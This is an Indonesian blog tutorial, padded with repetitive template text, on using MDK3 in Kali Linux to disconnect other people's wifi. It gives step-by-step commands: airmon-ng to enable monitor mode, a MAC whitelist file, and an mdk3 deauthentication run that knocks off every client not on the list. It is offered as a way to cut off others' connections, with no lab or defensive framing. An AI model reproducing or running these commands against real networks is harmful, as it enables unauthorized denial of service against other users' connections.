Monday, October 19, 2015

Cara Menggunakan MDK3 di Kali Linux untuk memutuskan koneksi wifi orang lain

Cara Menggunakan MDK3 di Kali Linux untuk memutuskan koneksi wifi orang lain - Hallo sahabat Kang Rony, Pada Artikel yang anda baca kali ini dengan judul Cara Menggunakan MDK3 di Kali Linux untuk memutuskan koneksi wifi orang lain, kami telah mempersiapkan artikel ini dengan baik untuk anda baca dan ambil informasi didalamnya. mudah-mudahan isi postingan Artikel Kali Linux, yang kami tulis ini dapat anda pahami. baiklah, selamat membaca.

Judul : Cara Menggunakan MDK3 di Kali Linux untuk memutuskan koneksi wifi orang lain
link : Cara Menggunakan MDK3 di Kali Linux untuk memutuskan koneksi wifi orang lain

Baca juga


Cara Menggunakan MDK3 di Kali Linux untuk memutuskan koneksi wifi orang lain

Cara Menggunakan MDK3 - Pasti di antara kalian pernah kan disaat enak enak download tiba tiba koneksi mati dengan sendirinya, dan membuat kita bikin sakit hati ketika yang kita download hampir selesai tiba tiba mati dengan sendirinya. Kali ini saya akan share cara menggunakan mdk3 di kali linux. Ingat Khusus pengguna Kali Linux bagi yang tidak punya kali linux silahkan laptopnya di dual boot aja, caranya gampang kok tunggu aja update dari blog ini.

Berikut Step by Step cara Menggunakan MDK3 :

1. Buka Terminal anda dan ketikkan perintah berikut

airmon-ng start wlan0
2. Selanjutnya anda copy macc address anda ketikkan "IFCONFIG WLAN0"3. Lanjutkan dengan perintah berikut ini "echo macc:anda >> whitelist.txt"
Contoh : echo 14:cc:34:12:0e:17 >> whitelist.txt


4. Selanjutnya jalankan dengan perintah "mdk3 mon0 d -w whitelist.txt"
whitelist.txt yang digunakan adalah yang kita buat tadi

cukup mudah bukan ?? bila ingin koneksi teman anda tidak terputus dari kegiatan anda di atas,sobat tinggal tambahkan macc address nya ke whitelist.txt yang sobat buat tadi, sekian tutorial dari saya bila ada pertanyaan silahkan berkomentar dibawah.




Demikianlah Artikel Cara Menggunakan MDK3 di Kali Linux untuk memutuskan koneksi wifi orang lain

Sekianlah artikel Cara Menggunakan MDK3 di Kali Linux untuk memutuskan koneksi wifi orang lain kali ini, mudah-mudahan bisa memberi manfaat untuk anda semua. baiklah, sampai jumpa di postingan artikel lainnya.

Anda sekarang membaca artikel Cara Menggunakan MDK3 di Kali Linux untuk memutuskan koneksi wifi orang lain dengan alamat link http://www.kang-rony.com/2015/10/cara-menggunakan-mdk3-di-kali-linux.html